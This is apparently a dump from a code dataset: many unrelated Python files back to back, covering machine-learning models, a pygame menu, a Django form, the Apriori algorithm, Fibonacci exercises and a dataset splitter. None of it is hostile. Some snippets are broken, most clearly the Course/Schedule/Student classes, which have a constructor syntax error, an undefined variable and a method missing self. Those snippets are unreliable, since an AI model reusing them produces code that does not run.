elif i <= encoding_vector_index:
r = 4 * np.sqrt(6 / (dimensions[i - 1] + dimensions[i]))
Wi = weight_variable(
[dimensions[i - 1],
dimensions[i]],
trainable=trainable[i],
init_std=0.1)
bi = bias_variable(
[dimensions[i]], trainable=trainable[i], init=0.1)
oi = tf.matmul(outputs[-1], Wi) + bi
oi = activations[i](oi)
elif i > encoding_vector_index:
Wi = tf.transpose(weights[size - i]) # tied weights
bi = bias_variable(
[dimensions[i]], trainable=trainable[i], init=0.1)
oi = tf.matmul(outputs[-1], Wi) + bi
oi = activations[i](oi)
weights.append(Wi)
biases.append(bi)
outputs.append(oi)
return weights, biases, outputs
def __build_nn_architecture(self, dim_Y, hidden_dimensions):
"""
Builds the autoencoder architecture given topology description
"""
Y = tf.placeholder(tf.float32, shape=[None, dim_Y])
config = tf.placeholder(tf.float32, shape=[None, len(self.knob_cols)])
placeholders = [config, Y]
weights, biases, outputs = self.__make_fc_layers(
Y, dim_Y, hidden_dimensions, self.activations, trainable=[True] *
(len(hidden_dimensions) + 1))
architecture = [placeholders, weights, biases, outputs]
return architecture
def get_encodings(self, labels):
"""
Returns encodings given a set of labels (aliases or job ids) after
calculating the centroids computed for each job (by averaging over
its job traces encodings)
"""
if self.centroids is not None:
encodings = list(
map(lambda x: self.centroids[int(x)], list(labels)))
encodings = np.asarray(encodings)
return encodings
return None
def get_reconstruction(self, X, y=None):
if np.ndim(X) > 1:
Y = X[:, 1 + len(self.knob_cols):]
else:
aux = np.shape(X[1 + len(self.knob_cols):])[0]
Y = np.reshape(X[1 + len(self.knob_cols):], [1, aux])
n = len(Y)
fake_config = np.zeros([n, len(self.knob_cols)])
try:
assert self._fitted == True
out = self._outputs[-1]
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
self._saver.restore_weights(sess)
dico = self.__get_feed_dict(fake_config, Y, self._placeholders)
reconstruction = out.eval(session=sess, feed_dict=dico)
return reconstruction
except AssertionError:
print("Error: needs to call fit before transform can be invoked")
raise
def serialize(self, filepath):
recons_info = self.get_persist_info()
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
np.save(filepath, recons_info)
def persist(self, filepath):
self.serialize(filepath)
def get_persist_info(self):
recons_info = {'best_params': self._saver.best_params,
'hidden_layer_sizes': self.hidden_layer_sizes,
'dim_Y': self.dim_Y, 'centroids': self.centroids,
'_last_fit_duration': self._last_fit_duration,
'altered_centroids': self.altered_centroids,
'refit_attempt': self.refit_attempt,
'auto_refit': self.auto_refit,
'max_refit_attempts': self.max_refit_attempts}
return recons_info
def load(self, filepath):
recons_info = np.load(filepath, allow_pickle=True)[()]
nn_weights = recons_info['best_params']
self.hidden_layer_sizes = recons_info['hidden_layer_sizes']
self.dim_Y = recons_info['dim_Y']
self.centroids = recons_info['centroids']
self.altered_centroids = recons_info['altered_centroids']
self._last_fit_duration = recons_info['_last_fit_duration']
self.max_refit_attempts = recons_info['max_refit_attempts']
self.fake_fit(nn_weights)
def load_(self, recons_info):
nn_weights = recons_info['best_params']
self.hidden_layer_sizes = recons_info['hidden_layer_sizes']
self.dim_Y = recons_info['dim_Y']
self.centroids = recons_info['centroids']
self.altered_centroids = recons_info['altered_centroids']
self._last_fit_duration = recons_info['_last_fit_duration']
self.max_refit_attempts = recons_info['max_refit_attempts']
self.auto_refit = recons_info['auto_refit']
self.fake_fit(nn_weights)
@staticmethod
def build(
n_iter=500, encoding_dim=3, depth=2, nh=20, activation='linear',
initial_learning_rate=1e-3, solver='Adam', batch_size=32,
random_state=10, early_stopping=False, patience=10, lamda=1e-1,
knob_cols=None, auto_refit=True, max_refit_attempts=10):
"""
Provides another interface (other than the constructor) for
constructing autoencoder objects...
"""
assert knob_cols is not None
encoder_hidden_layers = [int(nh / (2**i)) for i in range(depth - 1)]
if len(encoder_hidden_layers) > 0:
if 0 in encoder_hidden_layers or encoder_hidden_layers[-1] < encoding_dim:
return None
decoder_hidden_layers = encoder_hidden_layers[::-1]
hidden_layer_sizes = encoder_hidden_layers + \
[encoding_dim] + decoder_hidden_layers
activations = [activation] * 2 * depth
ae = FancyAutoEncoder(
n_iter, hidden_layer_sizes, activations, initial_learning_rate,
solver=solver, batch_size=batch_size, random_state=random_state,
early_stopping=early_stopping, patience=patience, lamda=lamda,
knob_cols=knob_cols, auto_refit=auto_refit,
max_refit_attempts=max_refit_attempts)
return ae
@staticmethod
def valid_params(ae_params, encoding_size, n_knob_cols):
"""
TODO: recheck if I can even improve further this function...
or double check if the params can be provided in a different way?!
"""
nh = ae_params['nh']
depth = ae_params['depth']
if depth >= 2:
return (nh / (2**(depth - 2))) > n_knob_cols + encoding_size
return True
|
998,124 | 243461e7b70a633bf2ae431b294c99df121d95ea | a=int(input())
x= [int(n) for n in input().split()]
def median(x):
x.sort()
mid = len(x) // 2
return (x[mid] + x[~mid]) // 2
s1=median(x)
print(s1)
|
998,125 | d03d8477dccbdec4c8787dab1fff0f4b8e918987 | import pygame
from game import Game
import os
start_btn = pygame.image.load(os.path.join('menu', 'button_play.png'))
logo = pygame.image.load('logo.png')
class MainMenu:
def __init__(self):
self.width = 1250
self.height = 700
self.win = pygame.display.set_mode((self.width, self.height))
self.bg = pygame.image.load(os.path.join('game_assets', 'bg.png'))
self.bg = pygame.transform.scale(self.bg, (self.width, self.height))
self.btn = (self.width/2 - start_btn.get_width()/2, 350, start_btn.get_width(), start_btn.get_height())
def __run__(self):
run = True
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = pygame.mouse.get_pos()
if self.btn[0] <= x <= self.btn[0] + self.btn[2]:
if self.btn[1] <= y <= self.btn[1] + self.btn[3]:
game = Game(self.win)
game.wave = 0
game.current_wave = [20, 0, 0][:]
game.__run__()
self.draw(self.win)
pygame.quit()
def draw(self, win):
self.win.blit(self.bg, (0,0))
self.win.blit(logo, (self.width/2 - logo.get_width()/2, 0))
self.win.blit(start_btn, (self.btn[0], self.btn[1]))
pygame.display.update()
|
998,126 | d11beb2dc14ad353b42cabd46eef3ce4619f5570 | from django.core import validators
from django import forms
from django.db.models import fields
from django.forms import widgets
from .models import Student
class StudentRegistration(forms.ModelForm):
class Meta:
model = Student
fields = ('name', 'email', 'password') #We can use list as well
widgets = {
'name':forms.TextInput(attrs={'class': 'form-control'}),
'email':forms.EmailInput(attrs={'class': 'form-control'}),
'password':forms.PasswordInput(render_value = True, attrs={'class': 'form-control'}),
} |
998,127 | a12206b7bbbf61147507c844977c4b09240e21ae | import time
import torch
import subprocess
import os
from model import EAST
from model2 import EASTER
from detect import detect_dataset
import numpy as np
import shutil
def eval_model(model_path, test_img_path, submit_path='./submit', save_flag=True, set_scale=4, model='EAST', limit=False):
if os.path.exists(submit_path):
shutil.rmtree(submit_path)
os.mkdir(submit_path)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print ('Picked Device')
print (device)
if (model == 'EAST'):
model = EAST(False).to(device)
else:
model = EASTER(False).to(device)
scale = set_scale
model.load_state_dict(torch.load(model_path, map_location=device))
model.eval()
start_time = time.time()
detect_dataset(model, device, test_img_path, submit_path, scale=scale, limit_images=limit)
os.chdir(submit_path)
res = subprocess.getoutput('zip -q submit.zip *.txt')
res = subprocess.getoutput('mv submit.zip ../')
os.chdir('../')
res = subprocess.getoutput('python ./evaluate/script.py –g=./evaluate/gt.zip –s=./submit.zip')
print(res)
os.remove('./submit.zip')
print('eval time is {}'.format(time.time()-start_time))
if not save_flag:
shutil.rmtree(submit_path)
return res
if __name__ == '__main__':
#model_name = './pths/east_vgg16.pth'
model_name = './pths/EASTER-sm1-aug3-no_ignore-375.pth'
test_img_path = os.path.abspath('/home/surajm72/data/ICDAR_2015/test_img')
submit_path = './submit'
scale = 2
model = 'EASTER'
eval_model(model_name, test_img_path, submit_path, set_scale=scale, model=model)
|
998,128 | 96351f36468876e8fe5e433357c95ee9b283c265 | def get_fibonacci_last_digit(n):
if (n < 1):
return n
prev = 0
curr = 1
for _ in range(n - 1):
prev, curr = curr % 10, (prev + curr) % 10
return curr % 10
def get_fibonacci_sum(n):
last_digit = get_fibonacci_last_digit((n + 2) % 60)
sum_last_digit = get_last_digit_after_subtraction(last_digit, 1)
return sum_last_digit
def get_fibonacci_partial_sum(a, b):
last_digit_partial_sum = get_last_digit_after_subtraction(get_fibonacci_sum(b), get_fibonacci_sum(a - 1))
return last_digit_partial_sum
def get_last_digit_after_subtraction(last_digit_minuend, last_digit_subtrahend):
if (last_digit_minuend < last_digit_subtrahend):
last_digit_minuend = last_digit_minuend + 10
return last_digit_minuend - last_digit_subtrahend
if __name__ == '__main__':
a, b = map(int, input().split())
print(get_fibonacci_partial_sum(a, b))
|
998,129 | 90e4336b9f271c410edc63189503e7bedb6a164d | #Ibrahim Kamal
#ik363
#Ball class to draw the ball
from Drawable import Drawable
import pygame
class Ball(Drawable):
def __init__(self , location , color , radius , visibility):
super().__init__(visibility) #visibility boolean of ball
self.location = location #location of ball
self.color = color #color of ball
self.radius = radius #radius of ball
def draw(self , surface):
#drawing ball ball if visibility boolean is true
if self.visibility:
pygame.draw.circle(surface , self.color , (round(self.location[0]) , round(self.location[1])) , self.radius)
def get_rect(self):
#returning rect for the ball
self.rect = pygame.Rect(self.location[0]-self.radius , self.location[1]-self.radius , self.radius*2 , self.radius*2)
return self.rect |
998,130 | 9f05528974185ab74758a3f49b3f642580b9b068 | import json
import numpy as np
from fastai.text import *
from azureml.core.model import Model
import logging
logging.basicConfig(level=logging.DEBUG)
def init():
global model
model_path = Model.get_model_path('sa_classifier')
model_path = os.path.split(model_path)
model = load_learner(path=model_path[0], file =model_path[1])
def run(data):
try:
result = model.predict(data)
output = json.dumps({'sentiment':str(result[0]),
'likelihood':str(result[2])
}
)
return output
except Exception as e:
error = str(e)
return error |
998,131 | afbcff4f0accfe775ef91c55864960e307825488 |
from townsquare import db, app, manager
db.init_app(app)
if __name__ == '__main__':
manager.run() |
998,132 | 0af9eb188dc4d963651e2960b95cf3428baec82f | from pyscf import gto, scf, ao2mo
import numpy as np
mol = gto.M(atom='H 0 0 0; H 0 0 0.7414', basis='sto3g')
mol.build()
mf = scf.RHF(mol)
ehf = mf.kernel()
hij = mf.get_hcore()
print(hij)
print("Mo coeff: " + str(mf.mo_coeff))
mohij = np.dot(np.dot(mf.mo_coeff.T, hij), mf.mo_coeff)
print(mohij)
print("Orbitals energies %s" % mf.mo_energy)
mf.get_ovlp()
mf.get_jk()
mf.get_k()
# norbs = mo_coeff.shape[0]
# eri = ao2mo.incore.full(mf._eri, mo_coeff, compact=False)
# mohijkl = eri.reshape(norbs, norbs, norbs, norbs)
#enuke = gto.mole.energy_nuc(mol) # Nuclear repulsion energy
#print(enuke)
|
998,133 | f7defb9a743d98a098d38e39f5a42fed6aa919e1 | # 导入pygame包
import pygame
# 初始化pygame
pygame.init()
# pygame内容 编写游戏的代码
print("游戏的代码。。。")
# 退出pygame 释放内存
pygame.quit() |
998,134 | 8243f2b6777c3fb6917dedcba210116d5737deea |
import matplotlib.pyplot as plt
from _3 import RandomWalk
rw = RandomWalk()
rw.fill_walk()
plt.scatter(rw.x_values, rw.y_values, s=15)
plt.show()
|
998,135 | 318e193079c933e6b9523adf05f701b242085ca4 | # -*- coding: cp936 -*-
import copy
#D=[['A','B','C','D'],
# ['B','C','E'],
# ['A','B','C','E'],
# ['B','D','E'],
# ['A','B','C','D']
# ]
D=[['I1','I2','I5'],
['I2','I4'],
['I2','I3'],
['I1','I2','I4'],
['I1','I3'],
['I2','I3'],
['I1','I3'],
['I1','I2','I3','I5'],
['I1','I2','I3']
]
L = []
for T in D:
print T
print
#找频繁1项集,扫描一遍数据库
def find_frequent_1_itemsets(D):
mapI = {}
F1 = []
for T in D:
for i in T:
if mapI.has_key(i):
mapI[i]+=1
else:
mapI[i]=1
for k in [k for k,v in mapI.items() if v>=2]:
l=[]
l.append(k)
F1.append(l)
return F1
#连接步
def comb(arr1,arr2):
tmap={}
for v in arr1+arr2 : tmap[v]=""
return tmap.keys()
#生成比L高一项的候选项集
def apriori_gen(L):
nextL = {}
s=""
for i in L:
for j in L:
com=comb(i,j)
if len(com)!=len(j)+1:
continue
com.sort()
if has_infrequent_subset(com, L):
continue
key=s.join(com)
if not nextL.has_key(key):
nextL[key] = com
return nextL.values()
def subset(c,l):
for i in c:
if i not in l:
return False
return True
#剪枝步
def has_infrequent_subset(c,preL):
for i in c:
work = copy.copy(c)
work.remove(i)
if work not in preL:
return True
return False
L.append(find_frequent_1_itemsets(D))
print "第1 次项频繁项集:"
print L[0]
i=0
s=""
while len(L[i])!=0:
L.append([])
C = apriori_gen(L[i])
print "第",i+2,"次项候选项集:"
print C
CMap = {}
CMapCnt = {}
#计数,每一项集扫描一趟
for T in D:
for item in C:
if subset(item,T):
key=s.join(item)
if CMap.has_key(key):
CMapCnt[key] +=1
else:
CMap[key]=item
CMapCnt[key]=1
for k in [k for k,v in CMapCnt.items() if v>=2]:
L[i+1].append(CMap[k])
i+=1
print "第",i+1,"次项频繁项集:"
print L[i]
|
998,136 | e93baca7a39b345f15bd7c15f0ecd2bf5311fc92 | from flask import Flask, jsonify
import json
from tasks import connect
app = Flask(__name__)
data = {"han": 0,
"hon": 0,
"den": 0,
"det": 0,
"denna":0,
"denne": 0,
"hen": 0,
'alltweets': 0}
@app.route('/run')
def index():
connect.delay()
return "Hello, World i will run bathc job come back in on hour!"
@app.route('/getresults', methods=['GET'])
def get_tasks():
with open('data.txt','r') as outfile:
mydata=json.load(outfile)
return jsonify(mydata)
|
998,137 | 466d68a3561bd50d46ca793b2146e23d9b39a753 | from app import manager
if __name__ == '__main__':
manager.run(host='0.0.0.0', ssl_context='adhoc')
|
998,138 | 9577eaac34c2fd2351c29f2e3587d886ec423c31 | class Course:
def __init__(self, name: str, num: str, instructor: str = 'TBA', schedule: str, credit: int = 0):
self.name = name
self.num = num
self.credit = credit
self.instructor = instructor
department = ''
for i in self.num:
if i not in '1234567890': department += i
self.department = department
def __gt__(self, other):
return self.credit > other.credit
def __ge__(self, other):
return self.credit >= other.credit
def __eq__(self, other):
return self.num == other.num and self.credit == other.credit
def __le__(self, other):
return self.credit <= other.credit
def __lt__(self, other):
return self.credit < other.credit
def finish(self, grade):
self.grade = grade
class Schedule:
def __init__(self, term: str = '', courses: list = []):
self.courses = courses
self.term = term
self.credit = 0
def __str__(self):
return 'Course scheudle for {}\nTaking {} credit hours\nCourses: {}'.format(self.term, self.credit, self.courses)
def addCourses(self, courses: list):
for i in courses:
self.courses.append(course)
self.credit += i.credit
class Student:
def __init__(self, name, grade='freshman'):
self.name = name
self.schedules = {}
self.grade = grade
self.gpa = 0
def __str__(self):
return '{} is a {} student with a {} GPA.'.format(self.name, self.grade, self.gpa)
def register(schedule: Schedule):
self.schedules[schedule.term] = schedule
def calcGPA(self):
pass
# Fall 2019
fall2019 = Schedule('Fall 2019')
num1011 = Course('Industrial Design Fundamentals 1', 'num1011', 'Sam Harris', 'tr', 2)
num1101 = Course('Intro to Industrial Design 1', 'num1101', 'Steve Chininis', 'm', 1)
num1401 = Course('Intro to Graphic Communication 1', 'num1401', 'Lisa Babb', 't', 1)
num1418 = Course('Intro to Sketching & Modelling 1', 'num1418', 'Dave Lynn', 'r', 1)
num2202 = Course('History of Modern Industrial Design', 'num2202', 'Joyce Medina', 'tr', 3)
apph1040 = Course('Scientific Foundations of Health', 'APPH1040', 'Michele Rosebruck', 'mw')
cee4803 = Course('Origami Engineering', 'CEE4803', 'Glaucio Paulino', 'tr', 3)
fall2019.addCourses([num1011, num1101, num1401, num1418, num2202, apph1040, cee4803])
tynan = Student('Tynan Purdy')
# Spring 2020
cs1301 = Course('Intro to Computing', 'CS1301', 3, 'Dr. Melinda McDaniel', 'mwf')
cs1301.finish(93.63)
|
998,139 | 955dac6633fc84e99d1571d64c3da37c95f78045 | import unittest
from config import Config
class VestingBalanceTestCase(unittest.TestCase):
def testCreateVestingBalance(self):
params = {
"owner": "testaccount6",
"amount": 10000,
"asset": "1.3.4",
"start": "2019-08-6T10:00:00",
"_type": "cdd",
"account": "1.2.26"
}
gph = Config().gph
try:
print("CreateVestingBalance:", gph.vesting_balance_create(**params))
except Exception as e:
print(repr(e))
def testWithdrawVestingBalance(self):
params = {
"vesting_id": "1.13.10",
"amount": 1000,
"asset": "1.3.4",
"account": "1.2.25"
}
gph = Config().gph
try:
print("DisApproveWitness:", gph.vesting_balance_withdraw(**params))
except Exception as e:
print(repr(e))
if __name__ == "__main__":
case1 = VestingBalanceTestCase("testCreateVestingBalance")
case1()
case2 = VestingBalanceTestCase("testWithdrawVestingBalance")
case2() |
998,140 | 5d40dd7be51f6204225634bdfeb12525de9d28fe | ##################################################################
# MESURE DU TAUX D'OCCUPATION DE PARKINGS A L'AIDE #
# DE CAMERAS VIDEOS #
# -------------------------------------------------------------- #
# Rémi Jacquemard - TB 2018 - HEIG-VD #
# remi.jacquemard@heig-vd.ch #
# https://github.com/remij1/TB_2018 #
# July 2018 #
# -------------------------------------------------------------- #
# Usefull to split a dataset to 3 folders: test, train and dev #
# Each rate can be set, and it can be called from the command #
# line. #
##################################################################
import glob
import os
import re
import random
from shutil import copyfile
import argparse
TEST_RATE = 0.1
DEV_RATE = 0.1
def split_dataset(dataset_path, output_path, exts, test_rate=TEST_RATE, dev_rate=DEV_RATE):
TRAIN_PATH = output_path + "/train"
TEST_PATH = output_path + "/test"
DEV_PATH = output_path + "/dev"
# finding files
all_files = []
for root, _, files in os.walk(dataset_path):
for f in files:
if f.endswith(exts[0]):
# finding all of the related files
name = f[:-len(exts[0])]
related_files = []
for ext in exts:
related_files.append(os.path.join(root, name + ext))
all_files.append(related_files)
#shuffling files
random.shuffle(all_files)
nb_test = test_rate * len(all_files)
nb_dev = dev_rate * len(all_files)
for files in all_files:
path = TRAIN_PATH # train dataset
if nb_test >= 0: # test dataset
path = TEST_PATH
nb_test -= 1
elif nb_dev >= 0: # dev dataset
path = DEV_PATH
nb_dev -= 1
os.makedirs(path, exist_ok=True)
for f in files:
copyfile(f, path + "/" + os.path.basename(f))
parser = argparse.ArgumentParser("dataset_splitter")
parser.add_argument("-i", "--input", nargs=1, help="the path to the dataset to split", type=str, required=True)
parser.add_argument("-o", "--output", nargs=1, help="the output path", type=str, required=True)
parser.add_argument("-e", "--exts", nargs='+', help="the extensions of data files. Ex.: if image.jpg and image.xml have to be related, ext: .jpg .xml", type=str, required=True)
parser.add_argument("-t", "--test_rate", nargs=1, help="the proportion of test data", type=float)
parser.add_argument("-d", "--dev_rate", nargs=1, help="the proportion of dev data", type=float)
if __name__ == '__main__':
args = parser.parse_args()
dataset_path = args.input[0]
output_path = args.output[0]
exts = args.exts
test_rate = TEST_RATE
if args.test_rate != None:
test_rate = args.test_rate[0]
dev_rate = DEV_RATE
if args.dev_rate != None:
dev_rate = args.dev_rate[0]
split_dataset(dataset_path, output_path, exts, test_rate, dev_rate)
|
998,141 | 5eb48e01141598ff7e686b9a4c84f152e0101afe | from __future__ import print_function
import keras
from keras.datasets import mnist
import matplotlib.pyplot as plt
import pickle
import numpy as np
(X_train, y_train), (X_test, y_test) = mnist.load_data()
pant = mnist.load_data()
class_names = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
X_train = X_train/255.0
X_test = X_test/255.0
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28,28)),
keras.layers.Dense(128, activation ="relu"),
keras.layers.Dense(10, activation="softmax")
])
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
model.fit(X_train, y_train, epochs=3)
test_loss, test_acc = model.evaluate(X_test, y_test)
print("Test loss is " + str(test_loss))
print("Test acc is " + str(test_acc * 100))
prediction = model.predict(X_test[:5])
num = 0
for i in range (len(prediction)):
guess = np.argmax(prediction[i])
actual = y_test[i]
print("The computer guessed that the number was a ", guess)
print("The number was actually a ", actual)
plt.imshow(X_test[i], cmap=plt.cm.binary)
plt.show()
model.save("ml.model")
print("model saved")
|
998,142 | 2c6741805ca69ac177670de4171cfe742cba5c68 | from django.test import TestCase
from .calc import add, subtract
class CalcTests(TestCase):
def test_add_two_numbers(self):
"""test that two numbers are added"""
self.assertEqual(add(5, 9), 14)
def test_subtract_numbers(self):
"""test that two numbers are subtracted from each other and returned"""
self.assertEqual(subtract(8, 4), 4)
|
998,143 | 8214d59b5fd50f4117e3de598244994636e04edb | # Demonstrates logging
# Attributes that can be put into the basicConfig:
# level
# filename
# filemode
# format
# %(name)s - %(levelname)s - %(message)s - %(asctime)s - %(lineno)s
import logging
# Determines the level at which logging will be issued: Info will show all levels up from INFO (INFO,
# WARNING, ERROR, CRITICAL), ERROR will show all levels up from ERROR (ERROR and CRITICAL)
#logging.basicConfig(level = logging.INFO)
# logging.basicConfig(level = logging.ERROR)
# To create new file with log rather than displaying in command line. Filemode w = write/overwrite new
# file, a = write/append file. Order of format items can be changed.
logging.basicConfig(filename = "debugging.log", filemode = "a", level=logging.DEBUG, format = " %(name)s - %(levelname)s - %(message)s - %(asctime)s - %(lineno)s")
name = "Joe"
logging.error("this is an error")
logging.critical("Critical level")
logging.warning("Don't know %s", name)
logging.info("Still going")
logging.debug("and so is this")
|
998,144 | df89d0b7d39ba30f3d814e71b7c660cbfcac5687 | kilometri=input("Unesite kilometre: ")
kilometri_float=float(kilometri)
milje=kilometri_float * 0.6213
print (milje) |
998,145 | 3edd24fadce05375eed7719540734f797047b69b | import sys
sys.path.append("..")
from _231_motifMatrix import profileMotifs, score, countMotifs, consensus
from _251_profileMostProbableKmer import profileMostProbableKmer
from lib import verticalPrint, spacedPrint
def greedyMotifSearch(dna, k, t):
#computes a collection of strings as best motifs.
bestMotifs = [row[:k] for row in dna[:t]]
for i in range(len(dna[0]) - k +1):
motif1 = dna[0][i:i+k]
candidateMotifs = [motif1]
for j in range(1,t):
profile = profileMotifs(candidateMotifs)
motif_i = profileMostProbableKmer(dna[j],k, profile)
candidateMotifs.append(motif_i)
if(score(candidateMotifs) < score(bestMotifs)):
bestMotifs = candidateMotifs
return bestMotifs
if __name__ == "__main__":
dna = [
"CAGTAACCGAACACATATGACCGGTCAGATTTCGCAAACATCCCAGGAGATTCGATCTGGCGCCCGATCTTCCAACGTCGTACATCGACATTGGACGTAGTAGGCCATGATACCTGGCAGGTCCGCCCCCGAGAACCATGGAACTACCGACATTGA",
"GTATATGTCCGGGAACCTTCATATAAGCAATAACAAACCTCATGTGCATGCCCCCGCTTATGAGGCGTTCACGCAGGGCTAGGTTAGGTGGCAAAGGCAACCTAAGTCTTCAGCTGACGGCCCCCACTGGAATTAGGCTATCCTAAGGGTTGGTAG",
"GTACGTATCGTATATGGCGGGGGGATGATATTCTCTGGAAGCGAATGGTTAAAACCGAATTTGGATATTGCTGCATAAGTCCGGACTGAAAATCGTTATTGGCTACAACTTGAAGTCATGAGGTTAAGGTATAGGACCATGTTCGGTTACATGCTG",
"CCTGTAACGCGCGCTCCGAGGAACTCTGAATTTAGCGATTATCTTGACGCCCCTTTAGTCGTGTGACTCTTGCGAACTCCCGACGACTATACCTTAAACCGAATATCGGTCGTGCTACCTCCCGGAGACGATATATATGCCCGGCTGGTACCCTGT",
"GAATGTAATCAAGCACTCAGACCAAACGGTTAGCCACTCTATCATGGGCCGCATTGCTAACAATACGACCGGATTACCTTCTATAGACGAGCTCGCTACTTCTGCGCAGTCTCCCTTTCTTTTTACATACACTAACGTTATGCACTCGCTGCCTAC",
"AAGCAGTACACCAGCTCGCCGTAGAGAGTCACAATTTGTTCGGCGTCAAGTCCGCATCAGTTTTTTCCCGTCCGCGTTCCCCGCGCATAAGACCGGAGGTGACTCGCAAAGGAAACGTATGAATGGCGGGGCGGGCGAATTTCTTGAATCCGCGTC",
"AAATTCCCTTACTTATACGCCCGGAACGCATTCTTCTTTTTACGGGTAGGGATGGACTGATGGACAGACAGGCAGTTACCATACTATCAACGGTCAGAATACTCGTCGGAGTGGTACTAAACAATCATGTTGCTATCCGGGCTCTGTTCACGCCAT",
"AGCGAAAAGCGCTCTGCGATTCAACCCCCAACGGTATCTTGCCGCTTCCGCCAGCGAATGACACGTGCCGCTGTTAGTGATGTACGCGGCCCTCAGAATGACCTGCAAGATTAATGGCCCCTTCACCATATCCGGACGTAAGCTGGATAGGGCCGG",
"TTGGTACCGACTCAAGATCCTCGGCCGATACACTGACAATACGGCCGGCTTTGCTTAGCATAATAAGTCACCAACTCCCTCCCGGGTATGGCCGTGGTAGTATACTATCACCTCCACTCTCGTTAATACCAAATCCTAATTGAGTTCACCAGGAAT",
"GCGATATGATTTTGTCTCCTAACATGAGTCTAAAGTGTATGATAATTGATAAATGTCATGAGATATGACCGGACTGAGTAACCGATTACCCAAAATAGACAAGGGTCCACTTTGCTCCCTAGCTAGTGATTAGGATAGCTACTCTACGCGGAGCCG",
"AATAGTTAGGAATCGCTGGTATAGACGCAGGCAAGAGAAAGTTTCCCTACAAATTTATGTACAATCGTGGAAGCTGGGACAAAGCCTGTGTCGATGTGTTTGGCTGGCACGTTGCGCGGAGTAAGTGAATGATAATAGGACCGGGACAGTTTCCCA",
"ACGTACCGGCTTGAAAATGGTGTATTGTCGTGCGCCAGCTTGGTAAAGAAGGGAGGCATGCATGATTGAGGCGCTAGAACGTCGGTGCTTGCATTTATAAGGTGAAACCCACCTGAAGACATGACCGGACGTCTGGATTCGTTTGAATAGGTCCGG",
"GTACTTTCACATTCGCGGACTTGGTACTCGTCACGTAAGCCTCTTAACGCCAAACACGACCGGGGCTTATCAGTTTGTTGGGGTATGGAGCCTGTGCGATATATTTAATCTGACCACGTCACATAAGCCCGGTCCAGGAAGTCGACCGGGGGAAAT",
"AGCGACAGATGCTGAAACCATTAAGTCGTGTAGGGAGAAAAACCTTATTCATTCCATCGCCATGCCACTCTTTGGCTGCAAACCAAGGCTCGTCCTTAGACGATAGGCTGATAAGACCGGCTTCCGAGAGTGGAGGCTTCATTTCCATAATGCTAG",
"GTATATGTCCGGTCAATGACACAGTGAACCTACCGAGTCGCAGCGATTGAGATAATTCACCAAGCGCTAGGTTTTATTAGTCGTCTAACACGGAGTGCTATAGGAATAATTAGGTGTGCCCTAATTTACCGGTGCCCGCTCAGCCAAACTCTAATG",
"GTGTCATCCCTCAGCGGTGTTAGCTAGTTATAGGTCCCTACTGTCCGTCAAGCTAAGGTAATGGAAGTAGTGTTACGAGCAGCCAATATTTGTAATCCCGCAGTTAGAAAATATGGCCGGGTTCCTACTCCCAGATTGTCCTACACGCCCGGCAGA",
"TCGAAGCTGGGGGTACTCCCCCACATGTCTAGAGTGCAGCTTCGGAAACATCGTACGCTTAGCGGGGATACGAGTGACTCAGTAGGCCCGGTGTTCTACATTTAATGGCCTGGCCTAAGGTAATAAGGCCGGGCGGTATTAACCTTTCAGATGGTT",
"ACTGAAAACCATCAGATACATTAAGGGCTTAGAGCAGGGGCTTCTATGCTATTACGTTTTGGTTAAAGCCACGCCGTTGCTTACGACCCGCATCCGCAACGAGCCAAAGTCTTTGCTTGGACCTGAGAATTCTAATATAGATGTACATAAGTCCGG",
"TGATACGACCGGCTAATTTACCATGAGTTTACTATAGCTAAAATTAAAAGCAGTAAACTCTGACATGAGCGCGTTGCTCGTGTCCCCCTAAGTCCCACACCAAGCAGCGGCCAAAAAACCTAGCCTCTACAAGAACCCCCATCTGTTGATGTACTG",
"CCCTTCGGACGCGTGGTCCGCGTCCTCACAATTGCGGTCCGCCCGACACAAGGTTGAGTCTTGCTCTTTTACTCTGACTGAAGGTGATACGCCCGGTAGAATGACATTCAGCGACAGGAATCTGCAAGAGTAGATTTCTCGCCCGGGCTTAACTAT",
"TCAAAGCATTCAGCATAGGGCCGGTCGCCAAGTCAGACCTAGAGGAGATGATAGCAATTGTCCAACGAAGATGTATTGTACTTGATGACTAAGCATTCCAGGATGAGATGTCACAATGAAGCGGACCTACTCTAGAATAGCTCGCTATAGGTCCTA",
"TCGACTCATAAATTCGTGAGAGATCATTCAATATGGGTATACTACTTCGCGCTACCTTTGTTCATTAATACATCCACGCGTAGGCTAGAACTAATCTAAGTATTTGATGAATAGGCCCGGGTAGGAAAAAGCCTGAACCCGAGGGCTACGTCCCGC",
"TTGTTATGCACGTTCTCTCTTTATGAACGACTCATGAAATAGGACCGGCAGTATTGGACTCGCATTTAGTATAATCAGTCGTGGTATCGATGGTTGTGCCGTCTGGCTCCGGATTTTCGTCACCTGCCCTCCCTAGTCGACTTTAGAAGGAACGGC",
"GTACCATGTGTGTTGGTCGCCTAACCTGAAAGATAGTAATAGGGCTGTATGCGTCCTCTAGTACATTTCAGAGCGAGATTTAGATTAGAAACCGGCTGCGAATATCCCACAGAGGACCAACCGAGTAAAATGAGTACTACGTTCGGATAAGGCCGG",
"TGGGTGTGCACATGCGTGTTGCTTTCTGGAAGTCTCTGAACGGAAGTGACATAGAAATCCTGGGGGAACGTTAGGTGCCCAGTTTCTGAATTTTGTATATCAAATTCAGAGACTAGGTGGAGTTCTAAACGACTGTGACTAAGTTTATATGACCGG",
]
verticalPrint(greedyMotifSearch(dna,12,25))
print(consensus(greedyMotifSearch(dna,12,25)))
|
998,146 | 782fc9d99165ac2d4d6c180819d97e9b3ef14d93 | import torch
import torch.nn as nn
from torch.autograd import Variable, grad
import numpy as np
import os
import common
class MWCNN(nn.Module):
def __init__(self, args, conv=common.default_conv):
super(MWCNN, self).__init__()
#n_resblocks = args.n_resblocks
n_feats = 64#args.n_feats
kernel_size = 3
self.scale_idx = 0
nColor = 1#args.n_colors
act = nn.ReLU(True)
self.DWT = common.DWT()
self.IWT = common.IWT(args)
n = 1
m_head = [common.BBlock(conv, nColor, n_feats, kernel_size, act=act)]
d_l0 = []
